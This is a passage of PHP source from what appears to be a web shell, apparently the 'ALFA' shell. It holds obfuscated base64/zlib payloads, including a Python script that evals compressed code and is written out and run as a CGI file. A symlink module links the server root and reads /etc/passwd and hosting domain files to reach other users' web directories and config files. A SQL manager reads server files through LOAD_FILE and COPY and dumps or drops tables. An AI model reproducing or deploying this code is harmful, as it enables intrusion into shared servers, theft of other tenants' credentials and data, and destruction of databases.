JINsVx6jiOYZttZE44z9uua4IQ1HYME3HILMq75jBMcHpl3hPa8/qtlqeEpjWhcSX4Bi2PjxWCv/dAzbo2kBeOIVKCqWxyxTqHdHL4govjHcdwfyYg2FTWEJ2RDwR0edHTGUeyIXC6nxMyhPzXIoauifwuPh3M/R34ZOlNVFu/rtaNOYG1r0nA0lPLt7dL73bpK4haqsmMgaxQx4KH/hRkOYX0Jp5wHdtC5r0EM22UFRVOmWBGoKXuaMReECUZtBO9VawBR/CukEr2QmjzbsKaUg4oCEg1l9aWAlS8d6XummVBRbkuJNSdc8Vz9y6XOS6UNk9z8H/CwS85PBMbe6WcAOUMHqjEm4raRsPO44LPcOKqVMmuU1qwysR3hHjasr7Wcq/m9JpZNZcndd7T3KKNGu/dmnSv1EXa8fEQIVIWRbAjj0vZ5aZqWZ62nN6+1dtKsSp+BVcrx4xdV1zV7hGLqcNeIFwBwaq2RnBLWddTXQTQUVFkhShXWrSq3GLRelXT75q+WRbMEEdX4yKbpaSp+74aK/TI0PYQnvFMVmQ90/zPuv3yQSnbWCnfySBiTwOXVfIL9KCfgm4ucGVxg5fWS0xXUOsaC2n/UQbxE01kkAEiRZbwiL2KoPXmOjjFXCIP9R7XpkeflOPjg3qlMw6CQhLu/kBT13m5/x1mPmRYsLINtHKDkoGvPWnVOdoCjbkOCV13XAVaKPkAixRcc2csUbzRzQ0qv9QqWB3Z0UDl1qmoKbVkFN4bTESvCgM1zAgQGe7CGNB48utZTCwL5nFuyTP7YvvS1iopwmqtuga9HVzaYm6RugaaHPxQNREqQ4itf6lM/FYyFXtlmX8G7NUN/DWEfer4vsQXdDYDhjVGdQvqzCutRS9al6iDdjyvtI/GrYYL1e52a5PYWs1i0C6lSqTktHMJnVpYcVdIVzoTb3SmiJFKFOuWymsdEXouE/giMCQWEQPlPT2Ul72ysWzL4lQPeih5EPLRnYhv1QIc1+KbaKtEjwWzcE5LBbOlUBu+Fnjg3AyatSD2Kth5VAGDHPehJXALgGXDGSZQzLsI3mM+kdazUVPNFtXIARgwxzBeyPMt5IEvKmRbGKc6fnAqFSzvHNYAaEpHYgf0qBJEzr9WYyGOVFvC8k3A3YtXrwJtZz/IZ2xi1WiAHqLr6sKwDU65JVXF0waCOnUeEw0CcrNwfriB2AOhABs4lA3EVQUSfkUnEUPhenoF/dWqz6AgpLe7s6PHO1/Gy3N1G4S73pm4DZ7J2+BJeRscpKe5uPIy+ETogjJ0nCVJdg31+gMQZIP0nRw+smIpAeSVUuM6OVx6BmmfkHO4iKt7eJ5A+0D5JBd/20hAJAheSF3QAfYPnBIY9H8BXEf6SM2TsABv9EDFO1O3M+E4iihj5TUcwne0ltrrSUFQ0NDqGvX41C6D9Fl1J9w0WUHaq0ncKhuKLqbl13JYkylSXlcrL2onyv9SgA//A3Qr5vcvEQAA")));';
	$py = '#!/usr/bin/python'."\nimport zlib, base64\n".'eval(compile(zlib.decompress(base64.b64decode("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")),\'<string>\',\'exec\'))';
	$cginame = "symperl.alfa";
	$source = $perl;
	$lang = "perl";
	if($_POST["alfa2"]=="sympy"){
		$cginame = "pysymlink.alfa";
		$source = $py;
		$lang = "python";
	}
	@__write_file($cginame,$source);
	@chmod($cginame,0755);
	echo __pre();
	$resource = alfaEx("{$lang} {$cginame} {$sympath}",false,true,true);
	if(strlen($resource) == 0){
		echo AlfaiFrameCreator('cgialfa/'.$cginame);
	}else{
		echo $resource;
	}
}
if(isset($_POST['alfa4']) && $_POST['alfa4']=='SymFile'){
if(function_exists('symlink')||_alfa_can_runCommand(true,true)){
AlfaNum(9,10);
echo __pre().'
<center><p><div class="txtfont_header">| Symlink File And Directory |</div></p><form onSubmit="g(\'symlink\',null,null,null,null,\'SymFile\',this.file.value,this.symfile.value,this.symlink.value);return false;" method="post">
<input type="text" name="file" placeholder="Example : /home/user/public_html/config.php" size="60"/><br />
<input type="text" name="symfile" placeholder="Example : alfa.txt" size="60"/>
<p><input type="submit" value=" " name="symlink" /></p></form></center>';
$path = $_POST['alfa5'];
$symname = $_POST['alfa6'];
$solevisible58 = $_POST['alfa7'];
if($solevisible58){
$new_name = str_replace(".", "_", basename($symname));
$rand_dir = $new_name.rand(111,9999);
$sym_dir = 'alfasymlinkphp/'.$rand_dir.'/';
@mkdir($sym_dir, 0777, true);
alfacgihtaccess('sym', $sym_dir, $symname);
_alfa_symlink("$path","$sym_dir/$symname");
echo __pre();
echo '<center><b><font color="white">Click >> </font><a target="_blank" href="'.$sym_dir.'" ><b><font size="4">'.$symname.'</font></b></a></b></center>';
}
}else{echo "<center><pre class=ml1 style='margin-top:5px'><b><font color=\"#FFFFFF\">[+] Symlink Function Disabled !</b></font></pre></center>";}
}
if(isset($_POST['alfa2']) && $_POST['alfa2']=='symphp'){
$cant_symlink = true;
if(function_exists('symlink')||_alfa_can_runCommand(false,false)){
@mkdir('alfasymlink',0777);
alfacgihtaccess('sym','alfasymlink/');
_alfa_symlink('/','alfasymlink/root');
$table_header = "<pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><table id='tbl_sympphp' align='center' width='40%' class='main' border='1'><td><span style='color:#FFFF01;'><b>*</span></b></td><td><span style='color:#00A220;'><b>Domains</span></b></td><td><span style='color:#FFFFFF;'><b>Users</span></b></td><td><span style='color:#FF0000;'><b>symlink</span></b></td>";
if(_alfa_file_exists("/etc/named.conf") && !_alfa_file_exists("/etc/virtual/domainowners") && _alfa_file_exists("/etc/valiases/")){
echo "<center>";
$lines = array();
$anony_domains = array();
$anonymous_users = array();
$f_black = array();
$error = false;
$anonymous = false;
$makepwd = "/home/{user}/public_html/";
$domains = alfaGetDomains();
$lines = $domains["lines"];
$state = $domains["state"];
$is_posix = function_exists("posix_getpwuid") && function_exists("fileowner");
$can_runcmd = _alfa_can_runCommand(false,false);
if(!$is_posix && !$can_runcmd){
	$anonymous = true;
	$anony_domains = $domains["lines"];
	$lines = _alfa_file('/etc/passwd');
}
echo $table_header;
$count=1;
$template = '<tr><td><span style="color:#FFFF01;">{count}</span></td><td style="text-align:left;"><a target="_blank" href="{http}"/><span style="color:#00A220;margin-left:10px;"><b>{domain}</b> </a></span></td><td style="text-align:left;"><span style="color:#FFFFFF;margin-left:10px;"><b>{owner}</font></b></td><td><a href="alfasymlink/root{sympath}" target="_blank"><span style="color:#FF0000;">Symlink</span></a></td></tr>';
foreach($lines as $line){
	$domain = "";
	$owner = "";
	if($anonymous){
		$explode = explode(":", $line);
		$owner = $explode[0];
		$owner_len = strlen($owner) - 1;
		$userid = $explode[2];
		if((int)$userid < 500)continue;
		$domain = "[?????]";
		$temp_black = array();
		$finded = false;
		foreach($anony_domains as $anony){
			if($state == "named.conf"){
				if(@strstr($anony, 'zone')){
					preg_match_all('#zone "(.*)"#',$anony, $data);
					$domain = $data[1][0];
				}else{
					continue;
				}
			}elseif($state == "named" || $state == "valiases"){
				if($anony == "." || $anony == "..")continue;
				if($state == "named")$anony = rtrim($anony, ".db");
				$domain = $anony;
			}
			$sub_domain = str_replace(array("-","."), "", $domain);
			if(substr($owner, 0, $owner_len) == substr($sub_domain, 0, $owner_len)){
				if(in_array($owner.$domain, $temp_black))continue;
				$sympath = str_replace("{user}", $owner, $makepwd);
				$http = "http://".$domain;
				echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, $domain, $owner, $sympath), $template);
				$count++;
				$temp_black[] = $owner.$domain;
				$finded = true;
			}
		}
		if(!$finded){
			$anonymous_users[] = $owner;
		}
	}else{
 		if($state == "named.conf"){
			if(@strstr($line, 'zone')){
				preg_match_all('#zone "(.*)"#',$line, $data);
				$domain = $data[1][0];
			}else{
				continue;
			}
		}elseif($state == "named" || $state == "valiases"){
			if($line == "." || $line == "..")continue;
			if($state == "named")$line = rtrim($line, ".db");
			$domain = $line;
		}
		if(strlen(trim($domain)) > 2 && $state != "passwd"){
			if(!_alfa_file_exists('/etc/valiases/'.$domain, false))continue;
			if($is_posix){
				$user = @posix_getpwuid(@fileowner('/etc/valiases/'.$domain));
				$owner = $user["name"];
			}elseif($can_runcmd){
				$owner = alfaEx("stat -c '%U' /etc/valiases/".$domain,false,false);
			}
		}
	}
	if(!$anonymous){
		if(strlen($owner)==0 || in_array($owner.$domain, $f_black))continue;
		$sympath = str_replace("{user}", $owner, $makepwd);
		$http = "http://".$domain;
		if($state == "passwd"){
			$http = "javascript:alert('we cant find domain...')";
		}
		echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, $domain, $owner, $sympath), $template);
		$count++;
		$f_black[] = $owner.$domain;
	}
}
if($anonymous){
	foreach($anonymous_users as $owner){
		$sympath = str_replace("{user}", $owner, $makepwd);
		$http = "javascript:alert('we cant find domain...')";
		echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, "[????]", $owner, $sympath), $template);
		$count++;
	}
}
$cant_symlink = false;
}else{
$is_direct = false;
$makepwd = alfaMakePwd();
if(_alfa_file_exists("/etc/virtual/domainowners")){
	$makepwd = "/home/{user}/public_html";
	$is_direct = true;
}
$sole = _alfa_file("/etc/virtual/domainowners");
$count=1;
echo $table_header;
$template = '<tr><td><span style="color:#FFFF01;">{count}</span></td><td style="text-align:left;"><a target="_blank" href="http://www.{url}"/><span style="color:#00A220;margin-left:10px;"><b>{url}</b> </a></span></td><td style="text-align:left;"><span style="color:#FFFFFF;margin-left:10px;"><b>{user}</font></b></td><td><a href="alfasymlink/root{cwd}" target="_blank"><span style="color:#FF0000;">Symlink</span></a></td></tr>';
if($sole){
	foreach($sole as $visible){
		if(@strstr($visible,":")){
			$solevisible = explode(':', $visible);
			$cwd = str_replace("{user}", trim($solevisible[1]), $makepwd);
			echo str_replace(array("{count}","{user}","{url}","{cwd}"), array($count++, trim($solevisible[1]), trim($solevisible[0]), $cwd), $template);
		}
	}
}else{
	$passwd = _alfa_file("/etc/passwd");
	if($passwd){
		$html = "";
		$is_named = false;
		$users = array();
		$domains = array();
		$uknowns = array();
		foreach($passwd as $user){
			$user = trim($user);
			$expl = explode(":", $user);
			if((int)$expl[2] < 500)continue;
			$users[$expl[0]] = $expl[5];
		}
		$site_domains = @scandir("/etc/virtual/");
		if(!$site_domains){
			$site_domains = alfaEx("ls /etc/virtual/");
			$site_domains = explode("\n", $site_domains);
			if(!$site_domains){
				$site_domains = _alfa_file("/etc/named.conf");
				if($site_domains){$is_named = true;}
			}
		}
		foreach($site_domains as $line){
			if($is_named){
				if(@strstr($line, 'zone')){
					preg_match_all('#zone "(.*)"#',$line, $data);
					$domain = $data[1][0];
					if(strlen($domain  > 2) && !empty($domain)){
						$domains[] = $domain;
					}
				}
			}else{
				$domains[] = $line;
			}
		}
		$x = 1;
		foreach($users as $user => $home){
			foreach($domains as $domain){
				$user_len = strlen($user) - 1;
				$sub_domain = str_replace(array("-","."), "", $domain);
				$five_user = substr($user, 0,$user_len);
				$five_domain = substr($sub_domain, 0,$user_len);
				if($five_user == $five_domain){
					if($is_direct){
						$cwd = str_replace("{user}", $user, $makepwd);
					}else{
						$expl = explode("}/", $makepwd);
						$cwd = $home."/".$expl[1];
					}
					$html .= str_replace(array("{count}","{user}","{url}", "{cwd}"), array($x++, $user, $domain, $cwd), $template);
				}else{
					$uknowns[$user] = $home;
				}
			}
		}
		$uknowns = array_unique($uknowns);
		foreach($uknowns as $user => $home){
			if($is_direct){
				$cwd = str_replace("{user}", $user, $makepwd);
			}else{
				$expl = explode("}/", $makepwd);
				$cwd = $home."/".$expl[1];
			}
			$html .= str_replace(array("{count}","{user}","{url}", "{cwd}"), array($x++, $user, "[?????]", $cwd), $template);
		}
		echo($html);
	}
}
echo "</table>";
$cant_symlink = false;
}
}else{
	echo "<pre class=ml1 style='margin-top:5px'><b><font color=\"#FFFFFF\">[+] Symlink Function Disabled !</b></font></pre></center>";
	$cant_symlink = false;
}
if($cant_symlink)echo '<pre id="strOutput" style="margin-top:5px" class="ml1"><br><font color="#FFFFFF">Error...</font></b><br>';
echo "</center></table>";
}
echo "</div>";
alfafooter();
}
function alfasql(){
if(!isset($_POST['sql_host'])){
$_POST['sql_host'] = $_SESSION["sql_host"];
$_POST['sql_login'] = $_SESSION["sql_login"];
$_POST['sql_pass'] = $_SESSION["sql_pass"];
$_POST['sql_base'] = $_SESSION["sql_base"];
}
class DbClass{
public $type;
public $link;
public $res;
function __construct($type){
$this->type = $type;
}
function connect($host, $user, $pass, $dbname){
switch($this->type){
case 'mysql':
if($this->link = @mysqli_connect($host,$user,$pass,$dbname)) return true;
break;
case 'pgsql':
$host = explode(':', $host);
if(!$host[1]) $host[1]=5432;
if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
break;
}
return false;
}
function selectdb($db){
switch($this->type){
case 'mysql':
if(@mysqli_select_db($db))return true;
break;
}
return false;
}
function query($str){
switch($this->type){
case 'mysql':
return $this->res = @mysqli_query($this->link,$str);
break;
case 'pgsql':
return $this->res = @pg_query($this->link,$str);
break;
}
return false;
}
function fetch(){
$res = func_num_args()?func_get_arg(0):$this->res;
switch($this->type){
case 'mysql':
return @mysqli_fetch_assoc($res);
break;
case 'pgsql':
return @pg_fetch_assoc($res);
break;
}
return false;
}
function listDbs(){
switch($this->type){
case 'mysql':
return $this->query("SHOW databases");
break;
case 'pgsql':
return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
break;
}
return false;
}
function listTables(){
switch($this->type){
case 'mysql':
return $this->res = $this->query('SHOW TABLES');
break;
case 'pgsql':
return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
break;
}
return false;
}
function error(){
switch($this->type){
case 'mysql':
return @mysqli_error($this->link);
break;
case 'pgsql':
return @pg_last_error();
break;
}
return false;
}
function setCharset($str){
switch($this->type){
case 'mysql':
if(function_exists('mysql_set_charset'))
return @mysqli_set_charset($this->link,$str);
else
$this->query('SET CHARSET '.$str);
break;
case 'pgsql':
return @pg_set_client_encoding($this->link, $str);
break;
}
return false;
}
function loadFile($str){
switch($this->type){
case 'mysql':
return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file"));
break;
case 'pgsql':
$this->query("CREATE TABLE solevisible(file text);COPY solevisible FROM '".addslashes($str)."';select file from solevisible;");
$r=array();
while($i=$this->fetch())
$r[] = $i['file'];
$this->query('drop table solevisible');
return array('file'=>implode("\n",$r));
break;
}
return false;
}
function dump($table, $fp = false){
switch($this->type){
case 'mysql':
$res = $this->query('SHOW CREATE TABLE `'.$table.'`');
$create = mysqli_fetch_array($res);
$sql = $create[1].";\n";
if($fp) fwrite($fp, $sql); else echo($sql);
$this->query('SELECT * FROM `'.$table.'`');
$head = true;
while($item = $this->fetch()){
$columns = array();
foreach($item as $k=>$v) {
if($v == null)
$item[$k] = "''";
elseif(is_numeric($v))
$item[$k] = $v;
else
$item[$k] = "'".@mysqli_real_escape_string($this->link, $v)."'";
$columns[] = "`".$k."`";
}
if($head) {
$sql = 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $item).')';
$head = false;
} else
$sql = "\n\t,(".implode(", ", $item).')';
if($fp) fwrite($fp, $sql); else echo($sql);
}
if(!$head)
if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n");
break;
case 'pgsql':
$this->query('SELECT * FROM '.$table);
while($item = $this->fetch()) {
$columns = array();
foreach($item as $k=>$v) {
$item[$k] = "'".addslashes($v)."'";
$columns[] = $k;
}
$sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
if($fp) fwrite($fp, $sql); else echo($sql);
}
break;
}
return false;
}
};
$db = new DbClass($_POST['type']);
if(@$_POST['alfa1']=='dumpfile'||@$_POST['alfa1']=='droptbl'){
$db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
$db->selectdb($_POST['sql_base']);
switch($_POST['charset']){
case "Windows-1251": $db->setCharset('calfa1251'); break;
case "UTF-8": $db->setCharset('utf8'); break;
case "KOI8-R": $db->setCharset('koi8r'); break;
case "KOI8-U": $db->setCharset('koi8u'); break;
case "calfa866": $db->setCharset('calfa866'); break;
}
$json = json_decode($_POST['alfa2'],true);
if(count($json['tbl'])>0){
if($_POST['alfa1']=='dumpfile'){
if($fp = @fopen($json['file'],'w')){
foreach($json['tbl'] as $v)$db->dump($v, $fp);
fclose($fp);
$dumpStatus = true;
}}else{
foreach($json['tbl'] as $v)$db->query('DROP TABLE '.$v);
}
}
unset($_POST['alfa2']);
}
alfahead();
echo "
<div class=header><center><div class='txtfont_header'>| Sql Manager |</div><p>".getConfigHtml('all')."</p></center>
<form name='sf' method='post' onsubmit='fs(this);return false;'><table cellpadding='2' cellspacing='0'><tr>
<td><div class=\"txtfont\">TYPE</div></td><td><div class=\"txtfont\">HOST</div></td><td><div class=\"txtfont\">DB USER</div></td><td><div class=\"txtfont\">DB PASS</div></td><td><div class=\"txtfont\">DB NAME</div></td><td></td></tr><tr>
<input type='hidden' name='a' value=Sql><input type='hidden' name='alfa1' value='query'><input type='hidden' name='alfa2' value=''><input type=hidden name=c value='". htmlspecialchars($GLOBALS['cwd']) ."'><input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'UTF-8') ."'>
<td><select name='type'><option value='mysql' ";
if(@$_POST['type']=='mysql')echo 'selected';
echo ">MySql</option><option value='pgsql' ";
if(@$_POST['type']=='pgsql')echo 'selected';
echo ">PostgreSql</option></select></td>
<td><input type='text' name='sql_host' id='db_host' value='". (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])) ."'></td>
<td><input type='text' name='sql_login' id='db_user' value='". (empty($_POST['sql_login'])?'':htmlspecialchars($_POST['sql_login'])) ."'></td>
<td><input type='text' name='sql_pass' id='db_pw' value='". (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."'></td><td>";
$tmp = "<input type='text' name='sql_base' id='db_name' value='". (empty($_POST['sql_base'])?'':htmlspecialchars($_POST['sql_base'])) ."'>";
if(isset($_POST['sql_host'])){
if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
$_SESSION["sql_host"] = $_POST['sql_host'];
$_SESSION["sql_login"] = $_POST['sql_login'];
$_SESSION["sql_pass"] = $_POST['sql_pass'];
$_SESSION["sql_base"] = $_POST['sql_base'];
switch($_POST['charset']){
case "Windows-1251": $db->setCharset('calfa1251'); break;
case "UTF-8": $db->setCharset('utf8'); break;
case "KOI8-R": $db->setCharset('koi8r'); break;
case "KOI8-U": $db->setCharset('koi8u'); break;
case "calfa866": $db->setCharset('calfa866'); break;
}
$db->setCharset('utf8');
$db->listDbs();
echo "<select name=sql_base><option value=''></option>";
while($item = $db->fetch()) {
list($key, $value) = each($item);
echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
}
echo '</select>';
}
else echo $tmp;
}else
echo $tmp;
echo "</td>
<td><input type='submit' value=' '></td>
<td><input type='checkbox' name='sql_count' value='on'" . (empty($_POST['sql_count'])?'':' checked') . "> <div class=\"txtfont\">count the number of rows</div></td>
</tr>
</table>
<script>mysql_cache['host']='".addslashes($_POST['sql_host'])."';mysql_cache['user']='".addslashes($_POST['sql_login'])."';mysql_cache['pass']='".addslashes($_POST['sql_pass'])."';mysql_cache['db']='".addslashes($_POST['sql_base'])."';mysql_cache['charset']='".addslashes($_POST['charset'])."';mysql_cache['type']='".addslashes($_POST['type'])."';mysql_cache['count']='".addslashes($_POST['sql_count'])."'</script>
";
if(isset($db) && $db->link){
echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
if(!empty($_POST['sql_base'])){
$db->selectdb($_POST['sql_base']);
echo "<tr><td width=1 style='border-top:2px solid #666;'><div class='txtfont'>Tables:</div><br><br>";
$tbls_res = $db->listTables();
while($item = $db->fetch($tbls_res)){
list($key, $value) = each($item);
if(!empty($_POST['sql_count']))
$n = $db->fetch($db->query('SELECT COUNT(*) as n FROM `'.$value.'`'));
$value = htmlspecialchars($value);
echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'>&nbsp;<a href='javascript:void(0);' onclick=\"fs('0','".$value."')\"><span class='mysql_tables' style='font-weight:unset;'>".$value."</span></a>" . (empty($_POST['sql_count'])?'&nbsp;':" <small><span style='font-weight:unset;' class='mysql_table_count'>({$n['n']})</span></small>") . "</nobr><br>";
}
echo "<p><input type='checkbox' onclick='is();'> <input type='button' value=' Dump ' onclick=\"fs('4');\" class='button'> <input type='button' value=' Drop ! ' onclick=\"fs('5');\" class='button'></p><div class='txtfont'>File path:</div><input type='text' id='dumpfile' name='file' value='dump.sql'>".($dumpStatus?'<p><a class="actions" href="javascript:void(0);" onclick="g(\'FilesTools\',null,\'dump.sql\', \'download\')"><font color="#0F0">~ Download File ~</font></a></p>':'')."</td><td style='border-top:2px solid #666;'>";
if(@$_POST['alfa1'] == 'select'){
$_POST['alfa1'] = 'query';
$_POST['alfa3'] = $_POST['alfa3']?$_POST['alfa3']:1;
$db->query('SELECT COUNT(*) as n FROM `'.$_POST['alfa2'].'`');
$num = $db->fetch();
$pages = ceil($num['n'] / 30);
echo "<span>".$_POST['alfa2']."</span> ({$num['n']} records) Page # <input type=text name='alfa3' value=" . ((int)$_POST['alfa3']) . ">";
echo " of $pages";
if($_POST['alfa3'] > 1)
echo " <a href='javascript:void(0);' onclick=fs('1','[\"".$_POST['alfa2']."\",\"".($_POST['alfa3']-1)."\"]')>&lt; Prev</a>";
if($_POST['alfa3'] < $pages)
echo " <a href='javascript:void(0);' onclick=fs('1','[\"".$_POST['alfa2']."\",\"".($_POST['alfa3']+1)."\"]')>Next &gt;</a>";
$_POST['alfa3']--;
$cache_table = $_POST['alfa2'];
if($_POST['type']=='pgsql')
$_POST['alfa2'] = 'SELECT * FROM `'.$_POST['alfa2'].'` LIMIT 30 OFFSET '.($_POST['alfa3']*30);
else
$_POST['alfa2'] = 'SELECT * FROM `'.$_POST['alfa2'].'` LIMIT '.($_POST['alfa3']*30).',30';
echo "<br><br>";
}
if((@$_POST['alfa1'] == 'query') && !empty($_POST['alfa2'])) {
$prikey = $db->fetch($db->query("SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA = '".@addslashes($_POST['sql_base'])."' AND TABLE_NAME = '".@addslashes($cache_table)."' AND COLUMN_KEY = 'PRI'"));
$db->query(@$_POST['alfa2']);
if($db->res !== false){
$title = false;
echo '<table width="100%" cellspacing="1" cellpadding="2" class="main" style="background-color:#292929" border="1">';
$line = 1;
while($item = $db->fetch()) {
if(!$title){
echo '<tr><th>#</th>';
foreach($item as $key => $value){
echo '<th>'.$key.'</th>';
}
reset($item);
$title=true;
echo '</tr><tr>';
$line = 2;
}
if($cache_table!=''){
	$cacheMsg = '<a href="javascript:void(0);" onclick=fs(\'2\',\'["'.$cache_table.'","'.(!$prikey['COLUMN_NAME']?0:$prikey['COLUMN_NAME']).'","'.__ZW5jb2Rlcg(json_encode((!$prikey['COLUMN_NAME']?$item:$item[$prikey['COLUMN_NAME']]))).'"]\')>Edit</a>';
}else{
	$cacheMsg ='-';
}
echo '<tr class="l'.$line.'"><td>'.$cacheMsg.'</td>';
$line = $line==1?2:1;
foreach($item as $key => $value){
if($value == null)
echo '<td><i>null</i></td>';
else
echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
}
echo '</tr>';
}
echo '</table>';
} else {
echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
}
}
echo('</form>');
if((@$_POST['alfa1'] == 'edit') && !empty($_POST['alfa2'])){
$data = explode(':',$_POST['alfa3']);
echo ('<p><div class="txtfont">Table:</div> <font color="#0F0">'.$data[0].'</font></p>');
echo("<form onsubmit='fsu(this);return false;'><table border='1'>");
if($data[1] != '0'){
$data[2] = __ZGVjb2Rlcg($data[2]);
$data[2] = str_replace('"','',$data[2]);
$fetch = $db->fetch($db->query("SELECT * FROM `".$data[0]."` WHERE `".$data[1]."` = '".$data[2]."'"));
$fetch['__ALFAKEY'] = $data[1];
$fetch['__ALFAKEYVAL'] = $data[2];
}else{
$d = __ZGVjb2Rlcg($data[2]);
$fetch = json_decode($d, true);
}
foreach($fetch as $key => $value){
if($key=='__ALFAKEY'||$key=='__ALFAKEYVAL')continue;
$value = htmlspecialchars($value);
echo("<tr><td>$key</td><td><input name='$key' value='$value' /></td></tr>");
}
